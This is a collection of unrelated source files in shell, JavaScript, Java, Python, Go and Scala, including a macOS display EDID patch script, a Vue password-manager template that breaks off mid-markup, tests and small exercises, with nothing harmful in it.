# This code is based off HP ProBook 4x30s Fix EDID by pokenguyen
GenEDID() {
/usr/libexec/PlistBuddy -c "Print :$1" /tmp/display.plist &>/dev/null || return 0
rm -f /tmp/EDID.bin
EDID=$(/usr/libexec/PlistBuddy -x -c "Print :$1" /tmp/display.plist |
tr -d '\n\t' | grep -o 'IODisplayEDID</key><data>[^<]*' |
sed 's/.*IODisplayEDID<\/key><data>//' | base64 -D | xxd -p | tr -d '\n\t\s')
version=${EDID:38:2}
basicparams=${EDID:40:2}
checksum=${EDID:254:2}
newchecksum=$(printf '%x' $((0x$checksum + 0x$version + 0x$basicparams - 0x04 - 0x90)) | tail -c 2)
newedid=${EDID:0:38}0490${EDID:42:212}${newchecksum}
echo $newedid | xxd -r -p >>/tmp/EDID.bin
if [ $? -eq 0 ]; then
RegName=$(/usr/libexec/PlistBuddy -c "Print :$1:IORegistryEntryName" /tmp/display.plist)
DisplayFlags=$(/usr/libexec/PlistBuddy -c "Print :$1:IODisplayConnectFlags" /tmp/display.plist)
VenID=$(/usr/libexec/PlistBuddy -c "Print :$1:DisplayVendorID" /tmp/display.plist)
VenIDhex=$(printf '%x\n' $VenID)
ProdID=$(/usr/libexec/PlistBuddy -c "Print :$1:DisplayProductID" /tmp/display.plist)
ProdIDhex=$(printf '%x\n' $ProdID)
GenPlist=~/"Desktop/${VenIDhex}_${ProdIDhex}.plist"
GenBin=~/"Desktop/${VenIDhex}_${ProdIDhex}.bin"
rm -f "$GenPlist" "$GenBin"
# This check does not really detect external displays
if [ "$RegName" == "AppleBacklightDisplay" -o "$DisplayFlags" == "$(echo AAgAAA== | base64 -D)" ] ||
[ "$RegName" == "AppleDisplay" -o "$DisplayFlags" == "$(echo AAgAAA== | base64 -D)" ]; then
/usr/libexec/PlistBuddy -c "Add :DisplayProductName string 'Display'" "$GenPlist"
/usr/libexec/PlistBuddy -c "Add :test array" "$GenPlist"
/usr/libexec/PlistBuddy -c "Merge /tmp/display.plist :test" "$GenPlist"
/usr/libexec/PlistBuddy -c "Copy :test:$1:DisplayProductID :DisplayProductID" "$GenPlist"
/usr/libexec/PlistBuddy -c "Copy :test:$1:DisplayVendorID :DisplayVendorID" "$GenPlist"
/usr/libexec/PlistBuddy -c "Remove :test" "$GenPlist"
/usr/libexec/PlistBuddy -c "Import :IODisplayEDID /tmp/EDID.bin" "$GenPlist"
mv /tmp/EDID.bin "$GenBin"
echo "Display $1"
echo " vendor id ${VenIDhex}"
echo " product id ${ProdIDhex}"
echo "EDID:"
xxd -i "$GenBin" | grep -vE 'unsigned|}'
echo "If you cannot inject this EDID via SSDT (AAPL00,override-no-connect), save $GenPlist as:"
echo "/System/Library/Displays/Contents/Resources/Overrides/DisplayVendorID-${VenIDhex}/DisplayProductID-${ProdIDhex}.plist"
else
echo "External display detected (${VenIDhex}_${ProdIDhex}}!"
fi
else
echo "No display detected!"
fi
}
rm -f /tmp/display.plist
case $(ioreg -n AppleBacklightDisplay -rxw0) in
"")
ioreg -n AppleDisplay -arxw0 >/tmp/display.plist
;;
*)
ioreg -n AppleBacklightDisplay -arxw0 >/tmp/display.plist
;;
esac
GenEDID 0 && GenEDID 1 && GenEDID 2
rm -f /tmp/display.plist /tmp/EDID.bin
|
import compression from 'compression';
import express from 'express';
import path from 'path';
export default () => {
return new Promise((resolve, reject) => {
let app = express();
app.use(compression());
// in npm run test:functional:dev mode we only watch and compile instantsearch.js
if (process.env.CI !== 'true') {
app.use((req, res, next) => {
if (req.path === '/instantsearch.min.js') {
res.redirect('/instantsearch.js');
return;
}
next();
});
}
app.use(express.static(path.join(__dirname, 'app')));
app.use(express.static(path.join(__dirname, '..', 'dist')));
let server = app.listen(process.env.PORT || 9000);
server.once('listening', () => resolve(server));
server.once('error', reject);
});
};
|
package org.opencb.opencga.catalog.managers;
import org.opencb.datastore.core.ObjectMap;
import org.opencb.datastore.core.QueryOptions;
import org.opencb.datastore.core.QueryResult;
import org.opencb.opencga.catalog.authentication.AuthenticationManager;
import org.opencb.opencga.catalog.exceptions.CatalogException;
import org.opencb.opencga.catalog.utils.ParamUtils;
import org.opencb.opencga.catalog.managers.api.ISampleManager;
import org.opencb.opencga.catalog.authorization.AuthorizationManager;
import org.opencb.opencga.catalog.exceptions.CatalogAuthorizationException;
import org.opencb.opencga.catalog.utils.CatalogSampleAnnotationsValidator;
import org.opencb.opencga.catalog.models.*;
import org.opencb.opencga.catalog.db.api.*;
import org.opencb.opencga.catalog.io.CatalogIOManagerFactory;
import org.opencb.opencga.core.common.TimeUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.*;
/**
* @author <NAME> <<EMAIL>>
*/
public class SampleManager extends AbstractManager implements ISampleManager {
protected static Logger logger = LoggerFactory.getLogger(SampleManager.class);
public SampleManager(AuthorizationManager authorizationManager, AuthenticationManager authenticationManager,
CatalogDBAdaptor catalogDBAdaptor, CatalogIOManagerFactory ioManagerFactory,
Properties catalogProperties) {
super(authorizationManager, authenticationManager, catalogDBAdaptor, ioManagerFactory, catalogProperties);
}
@Override
public Integer getStudyId(int sampleId) throws CatalogException {
return sampleDBAdaptor.getStudyIdBySampleId(sampleId);
}
@Override
public QueryResult<AnnotationSet> annotate(int sampleId, String id, int variableSetId,
Map<String, Object> annotations, Map<String, Object> attributes,
boolean checkAnnotationSet, String sessionId)
throws CatalogException{
ParamUtils.checkParameter(sessionId, "sessionId");
ParamUtils.checkParameter(id, "id");
ParamUtils.checkObj(annotations, "annotations");
attributes = ParamUtils.defaultObject(attributes, HashMap<String, Object>::new);
String userId = userDBAdaptor.getUserIdBySessionId(sessionId);
int studyId = sampleDBAdaptor.getStudyIdBySampleId(sampleId);
if (!authorizationManager.getStudyACL(userId, studyId).isWrite()) {
throw new CatalogException("Permission denied. User " + userId + " can't modify study");
}
QueryResult<VariableSet> variableSetResult = sampleDBAdaptor.getVariableSet(variableSetId, null);
if (variableSetResult.getResult().isEmpty()) {
throw new CatalogException("VariableSet " + variableSetId + " does not exists");
}
VariableSet variableSet = variableSetResult.getResult().get(0);
AnnotationSet annotationSet =
new AnnotationSet(id, variableSetId, new HashSet<>(), TimeUtils.getTime(), attributes);
for (Map.Entry<String, Object> entry : annotations.entrySet()) {
annotationSet.getAnnotations().add(new Annotation(entry.getKey(), entry.getValue()));
}
QueryResult<Sample> sampleQueryResult = sampleDBAdaptor.getSample(sampleId,
new QueryOptions("include", Collections.singletonList("annotationSets")));
List<AnnotationSet> annotationSets = sampleQueryResult.getResult().get(0).getAnnotationSets();
if (checkAnnotationSet) {
CatalogSampleAnnotationsValidator.checkAnnotationSet(variableSet, annotationSet, annotationSets);
}
return sampleDBAdaptor.annotateSample(sampleId, annotationSet);
}
@Override
public QueryResult<Annotation> load(File file) throws CatalogException {
throw new UnsupportedOperationException();
}
@Override
public QueryResult<Sample> create(QueryOptions params, String sessionId) throws CatalogException {
ParamUtils.checkObj(params, "params");
return create(
params.getInt("studyId"),
params.getString("name"),
params.getString("source"),
params.getString("description"),
params.getMap("attributes"),
params,
sessionId
);
}
@Override
public QueryResult<Sample> create(int studyId, String name, String source, String description,
Map<String, Object> attributes, QueryOptions options, String sessionId)
throws CatalogException {
ParamUtils.checkParameter(sessionId, "sessionId");
ParamUtils.checkParameter(name, "name");
source = ParamUtils.defaultString(source, "");
description = ParamUtils.defaultString(description, "");
String userId = userDBAdaptor.getUserIdBySessionId(sessionId);
if (!authorizationManager.getStudyACL(userId, studyId).isWrite()) {
throw new CatalogException("Permission denied. User " + userId + " can't modify study");
}
Sample sample = new Sample(-1, name, source, null, description, Collections.<AnnotationSet>emptyList(),
attributes);
return sampleDBAdaptor.createSample(studyId, sample, options);
}
@Override
public QueryResult<Sample> read(Integer sampleId, QueryOptions options, String sessionId) throws CatalogException {
ParamUtils.checkParameter(sessionId, "sessionId");
String userId = userDBAdaptor.getUserIdBySessionId(sessionId);
int studyId = sampleDBAdaptor.getStudyIdBySampleId(sampleId);
if (!authorizationManager.getStudyACL(userId, studyId).isRead()) {
throw new CatalogException("Permission denied. User " + userId + " can't read study");
}
return sampleDBAdaptor.getSample(sampleId, options);
}
@Override
public QueryResult<Sample> readAll(int studyId, QueryOptions query, QueryOptions options, String sessionId) throws CatalogException {
ParamUtils.checkObj(query, "query");
options = ParamUtils.defaultObject(options, QueryOptions::new);
ParamUtils.checkParameter(sessionId, "sessionId");
String userId = userDBAdaptor.getUserIdBySessionId(sessionId);
if (!authorizationManager.getStudyACL(userId, studyId).isRead()) {
throw new CatalogException("Permission denied. User " + userId + " can't read study");
}
query.putAll(options);
return sampleDBAdaptor.getAllSamples(studyId, query);
}
@Override
public QueryResult<Sample> readAll(QueryOptions query, QueryOptions options, String sessionId) throws CatalogException {
ParamUtils.checkObj(query, "query");
return readAll(query.getInt("studyId", -1), query, options, sessionId);
}
@Override
public QueryResult<Sample> update(Integer id, ObjectMap parameters, QueryOptions options, String sessionId) throws CatalogException {
throw new UnsupportedOperationException();
}
@Override
public QueryResult<Sample> delete(Integer id, QueryOptions options, String sessionId) throws CatalogException {
throw new UnsupportedOperationException();
}
/*
* Variables Methods
*/
@Override
public QueryResult<VariableSet> createVariableSet(int studyId, String name, Boolean unique,
String description, Map<String, Object> attributes,
List<Variable> variables, String sessionId)
throws CatalogException {
ParamUtils.checkObj(variables, "Variables List");
Set<Variable> variablesSet = new HashSet<>(variables);
if (variables.size() != variablesSet.size()) {
throw new CatalogException("Error. Repeated variables");
}
return createVariableSet(studyId, name, unique, description, attributes, variablesSet, sessionId);
}
@Override
public QueryResult<VariableSet> createVariableSet(int studyId, String name, Boolean unique,
String description, Map<String, Object> attributes,
Set<Variable> variables, String sessionId)
throws CatalogException {
String userId = userDBAdaptor.getUserIdBySessionId(sessionId);
ParamUtils.checkParameter(sessionId, "sessionId");
ParamUtils.checkParameter(name, "name");
ParamUtils.checkObj(variables, "Variables Set");
unique = ParamUtils.defaultObject(unique, true);
description = ParamUtils.defaultString(description, "");
attributes = ParamUtils.defaultObject(attributes, new HashMap<String, Object>());
for (Variable variable : variables) {
ParamUtils.checkParameter(variable.getId(), "variable ID");
ParamUtils.checkObj(variable.getType(), "variable Type");
variable.setAllowedValues(ParamUtils.defaultObject(variable.getAllowedValues(), Collections.<String>emptyList()));
variable.setAttributes(ParamUtils.defaultObject(variable.getAttributes(), Collections.<String, Object>emptyMap()));
variable.setCategory(ParamUtils.defaultString(variable.getCategory(), ""));
variable.setDependsOn(ParamUtils.defaultString(variable.getDependsOn(), ""));
variable.setDescription(ParamUtils.defaultString(variable.getDescription(), ""));
// variable.setRank(defaultString(variable.getDescription(), ""));
}
if (!authorizationManager.getStudyACL(userId, studyId).isWrite()) {
throw new CatalogException("Permission denied. User " + userId + " can't modify study");
}
VariableSet variableSet = new VariableSet(-1, name, unique, description, variables, attributes);
CatalogSampleAnnotationsValidator.checkVariableSet(variableSet);
return sampleDBAdaptor.createVariableSet(studyId, variableSet);
}
@Override
public QueryResult<VariableSet> readVariableset(int variableSet, QueryOptions options, String sessionId) throws CatalogException {
String userId = userDBAdaptor.getUserIdBySessionId(sessionId);
int studyId = sampleDBAdaptor.getStudyIdByVariableSetId(variableSet);
if (!authorizationManager.getStudyACL(userId, studyId).isRead()) {
throw new CatalogException("Permission denied. User " + userId + " can't read study");
}
return sampleDBAdaptor.getVariableSet(variableSet, options);
}
/**
* Cohort methods
* ***************************
*/
@Override
public int getStudyIdByCohortId(int cohortId) throws CatalogException {
return sampleDBAdaptor.getStudyIdByCohortId(cohortId);
}
@Override
public QueryResult<Cohort> readCohort(int cohortId, QueryOptions options, String sessionId) throws CatalogException {
ParamUtils.checkParameter(sessionId, "sessionId");
int studyId = sampleDBAdaptor.getStudyIdByCohortId(cohortId);
String userId = userDBAdaptor.getUserIdBySessionId(sessionId);
if (authorizationManager.getStudyACL(userId, studyId).isRead()) {
return sampleDBAdaptor.getCohort(cohortId);
} else {
throw CatalogAuthorizationException.cantRead(userId, "Cohort", cohortId, null);
}
}
@Override
public QueryResult<Cohort> createCohort(int studyId, String name, String description, List<Integer> sampleIds,
Map<String, Object> attributes, String sessionId) throws CatalogException {
ParamUtils.checkParameter(name, "name");
ParamUtils.checkObj(sampleIds, "Samples list");
description = ParamUtils.defaultString(description, "");
attributes = ParamUtils.defaultObject(attributes, HashMap<String, Object>::new);
if (readAll(studyId, new QueryOptions("id", sampleIds), null, sessionId).getResult().size() != sampleIds.size()) {
throw new CatalogException("Error: Some sampleId does not exist in the study " + studyId);
}
Cohort cohort = new Cohort(name, TimeUtils.getTime(), description, sampleIds, attributes);
return sampleDBAdaptor.createCohort(studyId, cohort);
}
}
|
def format_name(firstName, lastName, age):
return f'{lastName}, {firstName} is {age} years old.'
# Usage example
print(format_name('John', 'Doe', 35)) # Output: Doe, John is 35 years old. |
python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/512+0+512-N-VB-IP/model --tokenizer_name model-configs/1024-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/512+0+512-N-VB-IP/512+0+512-N-VB-ADJ-ADV-1 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half_full --eval_function last_element_eval |
/**
* @param {number[][]} people
* @return {number[][]}
*/
var reconstructQueue = function(people) {
people.sort((a, b) => {
if (a[0] == b[0]) {
return a[1] - b[1];
} else {
return b[0] - a[0];
}
});
const res = [];
for (const person of people) {
res.splice(person[1], 0, person);
}
return res;
};
/**
* (h, k)
* [[7,0], [4,4], [7,1], [5,0], [6,1], [5,2]]
* 先按照高度h降序排列,k升序排列。
* 因为高度大的需要考虑的少,前面不会有更大的值。
* [[7,0], [7,1], [6,1], [5,0], [5,2], [4,4]]
* 然后先插入最高的
* [[7,0], [7,1]],同样高度的按k值升序排列。
* 接着插入次高的,插入到k值所在位置。
* [[7,0], [6,1], [7,1]]
* 重复以上步骤,
* [[5,0], [7,0], [6,1], [7,1]]
* [[5,0], [7,0], [5,2], [6,1], [7,1]]
* [[5,0], [7,0], [5,2], [6,1], [4,4], [7,1]]
*/
|
import android.app.Activity;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.util.Log;
import android.widget.TextView;
public class MainActivity extends AppCompatActivity {
TextView textView;
SQLiteDatabase sqLiteDatabase;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
textView = findViewById(R.id.textView);
sqLiteDatabase = this.openOrCreateDatabase("Users", MODE_PRIVATE, null);
// Create
sqLiteDatabase.execSQL("CREATE TABLE IF NOT EXISTS users (name VARCHAR, age INTEGER(3))");
sqLiteDatabase.execSQL("INSERT INTO users (name, age) VALUES ('John', 24)");
sqLiteDatabase.execSQL("INSERT INTO users (name, age) VALUES ('Jane', 22)");
sqLiteDatabase.execSQL("INSERT INTO users (name, age) VALUES ('Max', 28)");
// Read
Cursor c =sqLiteDatabase.rawQuery("SELECT * FROM users", null);
int nameIndex = c.getColumnIndex("name");
int ageIndex = c.getColumnIndex("age");
c.moveToFirst();
while (c !=null)
{
String name = c.getString(nameIndex);
String age = c.getString(ageIndex);
Log.i("Name", name);
Log.i("Age", age);
c.moveToNext();
}
// Update
sqLiteDatabase.execSQL("UPDATE users SET age = 25 WHERE name = 'John'");
// Delete
sqLiteDatabase.execSQL("DELETE FROM users WHERE name = 'Max' ");
}
} |
<filename>Java/ExerciciosExtras/exercicios/pilaresoo/Pelo.java<gh_stars>1-10
package ExerciciosExtras.exercicios.pilaresoo;
public enum Pelo {
CURTO, MEDIO, LONGO
} |
def pattern_match(str, substr):
i = 0
j = 0
while (i < len(str) and j < len(substr)):
if (str[i] == substr[j]):
i += 1
j += 1
else:
i = i - j + 1
j = 0
if (j == len(substr)):
return True
return False
# Example
str = "GeeksforGeeks"
substr = "Geeks"
if (pattern_match(str, substr)):
print("Substring found")
else:
print("Substring not found") |
package traversal
import (
"testing"
"github.com/KeisukeYamashita/go-vcl/internal/lexer"
"github.com/KeisukeYamashita/go-vcl/internal/parser"
)
func TestContents(t *testing.T) {
testCases := []struct {
input string
expectedAttrCount int
expectedBlockCount int
}{
{
`x = 10`,
1,
0,
},
{
`acl type name {
"local"
}`,
0,
1,
}, {
`sub pipe_if_local { x }`,
0,
1,
},
}
for n, tc := range testCases {
l := lexer.NewLexer(tc.input)
p := parser.NewParser(l)
program := p.ParseProgram()
content := Content(program)
if len(content.Attributes) != tc.expectedAttrCount {
t.Fatalf("contents.Attributes length failed[testcase:%d], got:%d, want:%d", n, len(content.Attributes), tc.expectedAttrCount)
}
if len(content.Blocks) != tc.expectedBlockCount {
t.Fatalf("contents.Blocks length failed[testcase:%d], got:%d, want:%d", n, len(content.Blocks), tc.expectedBlockCount)
}
}
}
func TestConvertBody(t *testing.T) {
testCases := []struct {
input string
expectedAttrCount int
expectedBlockCount int
}{
{
`x = 10`,
1,
0,
},
{
`acl type name {
"local"
}`,
0,
1,
}, {
`sub pipe_if_local { x }`,
0,
1,
},
}
for n, tc := range testCases {
l := lexer.NewLexer(tc.input)
p := parser.NewParser(l)
program := p.ParseProgram()
content := convertBody(program.Statements)
if len(content.Attributes) != tc.expectedAttrCount {
t.Fatalf("contents.Attributes length failed[testcase:%d], got:%d, want:%d", n, len(content.Attributes), tc.expectedAttrCount)
}
if len(content.Blocks) != tc.expectedBlockCount {
t.Fatalf("contents.Blocks length failed[testcase:%d], got:%d, want:%d", n, len(content.Blocks), tc.expectedBlockCount)
}
}
}
|
#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail
REPO=github.com/gugahoi/memento
HEADER_FILE="${GOPATH}/src/${REPO}/hack/boilerplate.go.txt"
pushd ${GOPATH}/src/k8s.io/code-generator
echo "--- Generating Internal Groups"
./generate-internal-groups.sh \
all \
${REPO}/pkg/client \
${REPO}/pkg/apis \
${REPO}/pkg/apis \
"ecr:v1alpha1" \
--go-header-file ${HEADER_FILE}
echo "--- Generating Groups"
./generate-groups.sh \
all \
${REPO}/pkg/client \
${REPO}/pkg/apis \
"ecr:v1alpha1" \
--go-header-file ${HEADER_FILE}
popd
|
class Car:
def __init__(self, make, model, color, year):
self.make = make
self.model = model
self.color = color
self.year = year
def getMake(self):
return self.make
def getModel(self):
return self.model
def getColor(self):
return self.color
def getYear(self):
return self.year |
<reponame>MorganEJLA/portfolio-dev<filename>js/index.js
const navToggle = document.querySelector('.nav-toggle');
const navLinks = document.querySelectorAll('.nav__link')
navToggle.addEventListener('click', () => {
document.body.classList.toggle('nav-open');
});
navLinks.forEach(link => {
link.addEventListener('click', () => {
document.body.classList.remove('nav-open');
})
})
// Getter
var topButton = document.getElementById("topBtn");
//shows up after 20px of scrolling down
window.onscroll = function() {scrollFunction()};
function scrollFunction(){
if(document.body.scrollTop > 2400 || document.documentElement.scrollTop>2400){
topButton.style.display = "block";
}
else{
topButton.style.display = "none";
}
}
//When user clicks on button, scroll to top
function topFunction(){
document.body.scrollTop = 0;
document.documentElement.scrollTop = 0;
} |
#
# created by vincentqin 2021.1.16
# export match pairs using DIR which can be used in SFM feature matching.
#
# setting paths
export DIR_ROOT=$PWD
export DB_ROOT=/PATH/TO/YOUR/DATASETS
workspace_path=$PWD
dataset_name="scene1"
input_datasets='ImageList("outputs/scene1.txt")'
images_path=$DB_ROOT
topN=50
###################################################################
# DO NOT EDIT THE FOLLOWING LINES IF YOU KNOW HOW TO DO WITH IT.
###################################################################
if [ ! -d $PWD/pairs ]; then
mkdir -p $PWD/pairs
fi
if [ ! -d $PWD/outputs ]; then
mkdir -p $PWD/outputs
fi
# generate images list
images_list=$workspace_path/outputs/$dataset_name.txt # DON'T EDIT!!!
python get_images_list.py --input $images_path --outputs $images_list
# extract features
db_desc_path=$workspace_path/outputs/$dataset_name.npy
if [ ! -f $db_desc_path ]; then
python -m dirtorch.extract_features --dataset ${input_datasets} \
--checkpoint dirtorch/data/Resnet101-AP-GeM.pt \
--output $db_desc_path \
--whiten Landmarks_clean --whitenp 0.25 --gpu 0
fi
# export pairs
pairs_file_path=$PWD/pairs/pairs-db-dir$topN.txt
python -m dirtorch.test_custom.py --dataset ${input_datasets} \
--checkpoint dirtorch/data/Resnet101-AP-GeM.pt \
--whiten Landmarks_clean --whitenp 0.25 --gpu 0 \
--load-feats $db_desc_path \
--out-json $PWD/outputs/${dataset_name}_query.json \
--images_path $images_path \
--output_pairs $pairs_file_path \
--topN $topN |
/* http://keith-wood.name/timeEntry.html
Vietnamese template for the jQuery time entry extension
Written by <NAME> (<EMAIL>). */
(function($) {
$.timeEntry.regional['vi'] = {show24Hours: false, separator: ':',
ampmPrefix: '', ampmNames: ['AM', 'PM'],
spinnerTexts: ['Hiện tại', 'Mục trước', 'Mục sau', 'Tăng', 'Giảm']};
$.timeEntry.setDefaults($.timeEntry.regional['vi']);
})(jQuery);
|
<gh_stars>0
import { BadRequestException, HttpException, HttpStatus } from '@nestjs/common';
export class BadRequest extends BadRequestException {
constructor(message: string) {
super(message);
}
}
|
package io.github.jlprat.akka.http.workshop.rejectionException
import akka.http.scaladsl.model.StatusCodes
import akka.http.scaladsl.testkit.ScalatestRouteTest
import org.scalatest.{FlatSpec, Matchers}
/**
* Created by @jlprat on 20/04/2017.
*/
class RejectionsExceptionsExampleSpec extends FlatSpec with ScalatestRouteTest with Matchers {
private val routeToTest = new RejectionsExceptionsExample().routes
"RejectionExceptionsExample" should "have a personalized message for 404" in {
Get("/not/existing") ~> routeToTest ~> check {
status shouldBe StatusCodes.NotFound
responseAs[String] shouldBe "Nothing to see here!"
}
}
it should "have a personalized message for wrong method" in {
Put("/getonly") ~> routeToTest ~> check {
status shouldBe StatusCodes.MethodNotAllowed
responseAs[String] shouldBe "Have you tried with more conventional methods?"
}
}
it should "provide special message when arithmetic exceptions" in {
Get("/division/2/0") ~> routeToTest ~> check {
status shouldBe StatusCodes.InternalServerError
responseAs[String] shouldBe "Do you math?"
}
}
it should "provide default message for any other exception" in {
Get("/crash") ~> routeToTest ~> check {
status shouldBe StatusCodes.InternalServerError
responseAs[String] shouldBe "There was an internal server error."
}
}
}
|
// begin-snippet: piped_arguments_options_notify
$ users.exe list -i | users.exe Welcome c3 --notify $*
welcome Cris
notify: a1 Avery (active)
notify: b1 Beatrix (active)
// end-snippet |
<filename>examples/filters/indices.js
module.exports = {
type: 'index',
/**
* Any indicies that trigger this predicate will be excluded from transfer
* @param index - Full index configuration
*/
predicate: (index) => index.name !== 'log_data_2016-12-01'
}; |
#!/bin/bash -e
rm -rf dist/types
mkdir dist/types
cd tools/tmp/modern
find . -name '*.d.ts' | cpio -pdm ../../../dist/types/
|
package at.doml.fnc.lab1
import at.doml.fnc.lab1.domain.{Domain, DomainElement}
import at.doml.fnc.lab1.relations.Relations
import at.doml.fnc.lab1.set.MutableFuzzySet
object Task4 extends App {
val u = Domain.intRange(1, 6)
val u2 = Domain.combine(u, u)
val r1 = new MutableFuzzySet(u2)
.set(DomainElement.of(1, 1), 1)
.set(DomainElement.of(2, 2), 1)
.set(DomainElement.of(3, 3), 1)
.set(DomainElement.of(4, 4), 1)
.set(DomainElement.of(5, 5), 1)
.set(DomainElement.of(3, 1), 0.5)
.set(DomainElement.of(1, 3), 0.5)
val r2 = new MutableFuzzySet(u2)
.set(DomainElement.of(1, 1), 1)
.set(DomainElement.of(2, 2), 1)
.set(DomainElement.of(3, 3), 1)
.set(DomainElement.of(4, 4), 1)
.set(DomainElement.of(5, 5), 1)
.set(DomainElement.of(3, 1), 0.5)
.set(DomainElement.of(1, 3), 0.1)
val r3 = new MutableFuzzySet(u2)
.set(DomainElement.of(1, 1), 1)
.set(DomainElement.of(2, 2), 1)
.set(DomainElement.of(3, 3), 0.3)
.set(DomainElement.of(4, 4), 1)
.set(DomainElement.of(5, 5), 1)
.set(DomainElement.of(1, 2), 0.6)
.set(DomainElement.of(2, 1), 0.6)
.set(DomainElement.of(2, 3), 0.7)
.set(DomainElement.of(3, 2), 0.7)
.set(DomainElement.of(3, 1), 0.5)
.set(DomainElement.of(1, 3), 0.5)
val r4 = new MutableFuzzySet(u2)
.set(DomainElement.of(1, 1), 1)
.set(DomainElement.of(2, 2), 1)
.set(DomainElement.of(3, 3), 1)
.set(DomainElement.of(4, 4), 1)
.set(DomainElement.of(5, 5), 1)
.set(DomainElement.of(1, 2), 0.4)
.set(DomainElement.of(2, 1), 0.4)
.set(DomainElement.of(2, 3), 0.5)
.set(DomainElement.of(3, 2), 0.5)
.set(DomainElement.of(1, 3), 0.4)
.set(DomainElement.of(3, 1), 0.4)
val test1 = Relations.isUTimesURelation(r1)
println(s"r1 is defined over UxU? $test1")
val test2 = Relations.isSymmetric(r1)
println(s"r1 is symmetric? $test2")
val test3 = Relations.isSymmetric(r2)
println(s"r2 is symmetric? $test3")
val test4 = Relations.isReflexive(r1)
println(s"r1 is reflexive? $test4")
val test5 = Relations.isReflexive(r3)
println(s"r3 is reflexive? $test5")
val test6 = Relations.isMaxMinTransitive(r3)
println(s"r3 is max-min transitive? $test6")
val test7 = Relations.isMaxMinTransitive(r4)
println(s"r4 is max-min transitive? $test7")
}
|
#!/bin/bash
DOCKER_CONTAINER=$([ ! -z "$1" ] && echo "$1" || echo "ucb-datalab-site")
echo "Site will run on localhost:4000"
docker run --rm -p 4000:4000 -v "$(pwd):/site" $DOCKER_CONTAINER:latest
|
#!/usr/bin/env bash
export SINGULARITY_IMAGE="${SINGULARITY_IMAGE:-singularity-r.simg}"
echo "Using Singularity image: ${SINGULARITY_IMAGE}"
version () {
singularity inspect "${SINGULARITY_IMAGE}" | \
grep "R_VERSION" | \
awk -F'"' '{print $4}'
}
set -e
set -x
# Verify R version
singularity exec R -q -e "stopifnot(getRversion() == '$(version)')"
{ set +x; } 2>/dev/null
echo "All tests passed!"
|
#!/bin/bash
echo grep -aE "$2" '"'"$1"'"'
lz4cat slim.topcode.1000.txt.lz4 | grep -aE $2 "$1"
|
#!/bin/bash
CURRENT_VERSION=$(cat package.json | jq -r .version)
if [[ "$GITHUB_TOKEN" == "" ]]; then
echo "Set GITHUB_TOKEN first"
exit 1
fi
echo v$CURRENT_VERSION
echo "pushing this release"
git tag v$CURRENT_VERSION
git push
git push --tags
echo "creating github release"
github-release release -u bernhard-42 -r three-cad-viewer -t v$CURRENT_VERSION -n three-cad-viewer-$CURRENT_VERSION
sleep 5
for f in dist/*; do
echo $f
github-release upload -u bernhard-42 -r three-cad-viewer -t v$CURRENT_VERSION -n $(basename $f) -f $f
done
|
#!/bin/bash
# This file fill generate and output all authors whom have contributed to the project
# to the root dir AUTHORS file.
if [ ! -f AUTHORS ]; then
echo "AUTHORS file not found. Are you not in the root directory?"
else
echo -e "This AUTHORS file is generated by ./script/authors.sh\nThank you to everyone whom has contributed to livecli / livestreamer.\n\n" > AUTHORS
git log --format='%aN' | sort -u >> AUTHORS
fi
|
class $q
{
static get(url, data) {
return $q.request('GET', url, data);
}
static put(url, data) {
return $q.request('PUT', url, data);
}
static post(url, data) {
return $q.request('POST', url, data);
}
static patch(url, data) {
return $q.request('PATCH', url, data);
}
static delete(url, data) {
return $q.request('DELETE', url, data);
}
static request(method, url, data) {
return jQuery.ajax({
method: method,
url: url,
data: data,
dataType: 'json'
})
.fail(response => {
if (typeof response.responseJSON !== 'undefined') {
let msg = typeof response.responseJSON.errorDescription === 'object'
? response.responseJSON.errorDescription.join('<br>')
: response.responseJSON.errorDescription;
if (response.status === 400)
toastr.warning(msg, response.responseJSON.error.toUpperCase());
else
toastr.error(msg, response.responseJSON.error.toUpperCase());
} else
toastr.error(`Received a non-JSON ${response.status} response from the server.`, 'Something went wrong!');
});
}
}
let Passwords = Vue.extend({
template: `<section class="password screen">
<article class="ui message">
<div class="ui big breadcrumb">
<a class="section" @click="openBreadcrumbFolder('root')">Root</a>
<span v-for="folder in breadcrumb">
<i class="right chevron icon divider"></i>
<a class="section" @click="openBreadcrumbFolder(folder)">{{ folder.name }}</a>
</span>
</div>
</article>
<article class="ui grid lockd controls">
<div class="ten wide column">
<div class="ui input">
<input type="text" placeholder="Filter" v-model="filter">
</div>
</div>
<div class="six wide column">
<div class="ui two basic icon buttons">
<button class="ui button" :class="{'active': layout == 'grid'}" @click="setLayout('grid')">
<i class="block layout icon"></i>
Grid
</button>
<button class="ui button" :class="{'active': layout == 'list'}" @click="setLayout('list')">
<i class="list layout icon"></i>
List
</button>
</div>
</div>
</article>
<article v-if="layout == 'grid'">
<div class="ui grid">
<div class="three wide computer four wide tablet column" v-for="folder in folders | filterBy filter in 'name'">
<div class="ui fluid link card" @click="openFolder(folder)">
<div class="image">
<img src="/images/folder.png" alt="Folder">
</div>
<div class="center aligned content">
<div class="header">{{ folder.name }}</div>
</div>
</div>
</div>
</div>
<div class="ui grid" v-if="passwords.length > 0">
<div class="four wide computer sixteen wide tablet column" v-for="password in passwords | filterBy filter in 'name'">
<div class="ui fluid card">
<div class="content">
<div class="header">{{ password.name }}</div>
<table class="ui table">
<tbody>
<tr>
<td><strong>URL</strong></td>
<td><a href="{{ password.url || '' }}">{{ password.url || 'none' }}</a></td>
</tr>
<tr>
<td><strong>User</strong></td>
<td>{{ password.user || 'none' }}</td>
</tr>
<tr>
<td><strong>Password</strong></td>
<td><span id="password_{{ password.id }}">******</span></td>
</tr>
</tbody>
</table>
</div>
<div class="ui two bottom attached buttons">
<button class="ui blue labeled icon button" @click="showPassword(password.id)">
<i class="search icon"></i>
Show Password
</button>
<button class="ui primary labeled icon button" @click="copyPassword(password.id)">
<i class="copy icon"></i>
Copy Password
</button>
</div>
</div>
</div>
</div>
</article>
<article v-if="layout == 'list'" class="ui segment">
